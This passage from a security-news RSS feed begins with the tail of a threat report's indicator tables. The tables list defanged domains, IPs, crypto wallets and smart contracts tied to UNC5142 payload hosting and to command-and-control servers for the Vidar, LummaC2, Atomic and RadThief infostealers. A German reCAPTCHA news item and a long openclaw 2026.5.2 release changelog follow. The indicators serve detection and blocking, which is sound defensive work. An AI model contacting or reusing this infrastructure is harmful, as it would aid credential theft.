<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>w1[.]discoverconicalcrouton[.]shop</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>tlfiyat[.]shop</span></p>
</td>
<td>
<p><span>VIDAR C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>stchkr[.]rest</span></p>
</td>
<td>
<p><span>VIDAR C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>opbafindi[.]com</span></p>
</td>
<td>
<p><span>VIDAR C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>cxheerfulriver[.]pics</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>importenptoc[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>voicesharped[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>inputrreparnt[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>torpdidebar[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>rebeldettern[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>actiothreaz[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>garulouscuto[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>breedertremnd[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>zenrichyourlife[.]tech</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>pasteflawwed[.]world</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>hoyoverse[.]blog</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>dsfljsdfjewf[.]info</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>stormlegue[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>blast-hubs[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>blastikcn[.]com</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>decreaserid[.]world</span></p>
</td>
<td>
<p><span>LUMMAC.V2 C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>80.64.30[.]238</span></p>
</td>
<td>
<p><span>UNC5142 Payload Hosting</span></p>
</td>
</tr>
<tr>
<td>
<p><span>95.217.240[.]67</span></p>
</td>
<td>
<p><span>VIDAR C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>37.27.182[.]109</span></p>
</td>
<td>
<p><span>VIDAR C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>95.216.180[.]186</span></p>
</td>
<td>
<p><span>VIDAR C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>82.115.223[.]9</span></p>
</td>
<td>
<p><span>ATOMIC C2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>91.240.118[.]2</span></p>
</td>
<td>
<p><span>RADTHIEF C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>Blockchain-Based IOCs </span></h4>
<h5><span>Wallet Addresses</span></h5></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Main Wallets</strong></p>
</td>
<td>
<p><strong>Secondary Wallets</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>0x9fA7A2F4872D10bF59d436EA8433067811F67C04</span></p>
<p><span>0x9FEF571BAeAbdB8bF417a780c1b78aAa3295fF45</span></p>
<p><span>0x3b5a23f6207d87B423C6789D2625eA620423b32D(OKX 35)</span></p>
</td>
<td>
<p><span>0x3b5a23f6207d87B423C6789D2625eA620423b32D(OKX 35)</span></p>
</td>
<td>
<p><span>Funding wallets used to layer funds before sending to the operator.</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0xF5B962Cca374de0b769617888932250363C5971B </span></p>
</td>
<td>
<p><span>0x9AAe9A373CECe9Ef8453fa2dEAF4bf7B8aFBfac9</span></p>
</td>
<td>
<p><span>The main actor controlled address that deploys and sends update transactions to the smart contract group.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h5>Smart Contract Groups</h5></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Contract Level</strong></p>
</td>
<td>
<p><strong>Main Addresses</strong></p>
</td>
<td>
<p><strong>Secondary Addresses</strong></p>
</td>
</tr>
<tr>
<td>
<p><strong>First Level</strong></p>
</td>
<td>
<p><span>0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53</span></p>
</td>
<td>
<p><span>0x8f386Ac6050b21aF0e34864eAbf0308f89C6f13c</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Second Level</strong></p>
</td>
<td>
<p><span>0x8FBA1667BEF5EdA433928b220886A830488549BD</span></p>
</td>
<td>
<p><span>0xd210e8a9f22Bc5b4C9B3982ED1c2E702D66A8a5E</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Third Level</strong></p>
</td>
<td>
<p><span>0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA</span></p>
</td>
<td>
<p><span>0x15b495FBe9E49ea8688f86776Fd7a50b156C6c3F</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android: Neue Recaptcha-Abfrage für Google-freie Smartphones problematisch]]></title>
<description><![CDATA[Google hat seine Recaptcha-Abfrage KI-sicher gemacht. Für Nutzer von Google-freien Android-Smartphones kann das zum Problem werden. (Captcha, Google)]]></description>
<link>https://tsecurity.de/de/3502823/it-nachrichten/android-neue-recaptcha-abfrage-fuer-google-freie-smartphones-problematisch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3502823/it-nachrichten/android-neue-recaptcha-abfrage-fuer-google-freie-smartphones-problematisch/</guid>
<pubDate>Sat, 09 May 2026 12:03:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google hat seine Recaptcha-Abfrage KI-sicher gemacht. Für Nutzer von Google-freien Android-Smartphones kann das zum Problem werden. (<a href="https://www.golem.de/specials/captcha/">Captcha</a>, <a href="https://www.golem.de/specials/google/">Google</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=208499&amp;page=1&amp;ts=1778320802" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc.
Gateway and agent hot paths are leaner ...]]></description>
<link>https://tsecurity.de/de/3482973/downloads/openclaw-202652/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482973/downloads/openclaw-202652/</guid>
<pubDate>Sun, 03 May 2026 01:46:19 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs.</li>
<li>Control UI and WebChat are more resilient across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Messaging fixes cover WhatsApp Channel/Newsletter targets, Telegram topic commands and networking, Discord delivery/startup edge cases, Slack threads, Signal groups/media, and visible reply routing.</li>
<li>Provider and media fixes cover OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, LM Studio reasoning metadata, Brave/SearXNG/Firecrawl web search, media paths, music, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Gateway/startup and restart: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable; add <code>openclaw gateway restart --force</code> and <code>--wait &lt;duration&gt;</code>, log active task run IDs before restart deferral timers, and report timeout restarts as explicit forced restarts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</li>
<li>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</li>
<li>Plugins/update: on the beta OpenClaw update channel, default-line npm and ClawHub plugin updates try <code>@beta</code> first and fall back to default/latest when no plugin beta release exists.</li>
<li>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</li>
<li>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params, and memoize transcript replay-policy resolution for stable config and process-env runs while preserving model-specific transport hook patches and custom-env provider behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</li>
<li>Tools/plugins: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references, and cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/beta: externalize ACPX behind <code>@openclaw/acpx</code> and diagnostics OpenTelemetry behind <code>@openclaw/diagnostics-otel</code>, keeping their heavier runtime stacks out of the core package until installed; prepare Google Chat, LINE, Matrix, Mattermost, BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, Zalo Personal, diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, WhatsApp, Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code>/<code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</li>
<li>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, add <code>googlemeet end-active-conference</code> for closing managed spaces after a call, and add <code>googlemeet test-listen</code> plus the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Plugins/ClawHub/onboarding: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verify ClawPack response headers and downloaded bytes, persist ClawPack digest/artifact metadata on install/update records and install-on-demand provider setup entries, and allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs and retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</li>
<li>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</li>
<li>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</li>
<li>Channels/WhatsApp: support explicit WhatsApp Channel/Newsletter <code>@newsletter</code> outbound message targets with channel session metadata instead of DM routing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921599881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/13417/hovercard" href="https://github.com/openclaw/openclaw/issues/13417">#13417</a>; carries forward the narrow outbound target idea from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3921655588" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/13424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/13424/hovercard" href="https://github.com/openclaw/openclaw/pull/13424">#13424</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agentz-manfred/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agentz-manfred">@agentz-manfred</a>.</li>
<li>Dependencies: refresh workspace, bundled runtime, and plugin dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, Marked 18.0.3, Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</li>
<li>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</li>
<li>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</li>
<li>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</li>
<li>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</li>
<li>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</li>
<li>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</li>
<li>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</li>
<li>Slack: publish a safe default App Home tab view on <code>app_home_opened</code>, include the Home tab event in setup manifests, and keep track of bot-participated threads across restarts so ongoing threaded conversations can continue auto-replying after the Gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</li>
<li>BlueBubbles: add opt-in <code>channels.bluebubbles.replyContextApiFallback</code> that fetches the original message from the BlueBubbles HTTP API when the in-memory reply-context cache misses (multi-instance deployments sharing one BB account, post-restart, after long-lived TTL/LRU eviction). Off by default; channel-level setting propagates to accounts that omit the flag through <code>mergeAccountConfig</code>; routed through the typed <code>BlueBubblesClient</code> so every fetch is SSRF-guarded by the same three-mode policy as every other BB client request; reply-id shape is validated and part-index prefixes (<code>p:0/&lt;guid&gt;</code>) are stripped before the request; concurrent webhooks for the same <code>replyToId</code> coalesce into one fetch and successful responses populate the reply cache for subsequent hits. Also promotes BlueBubbles attachment download failures from verbose to runtime error so silently-dropped inbound images are visible at default log level, and extends <code>sanitizeForLog</code> to redact <code>?password=…</code>/<code>?token=…</code> query params and <code>Authorization:</code> headers before they reach the log sink (CWE-532). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329493815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71820" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71820/hovercard" href="https://github.com/openclaw/openclaw/pull/71820">#71820</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
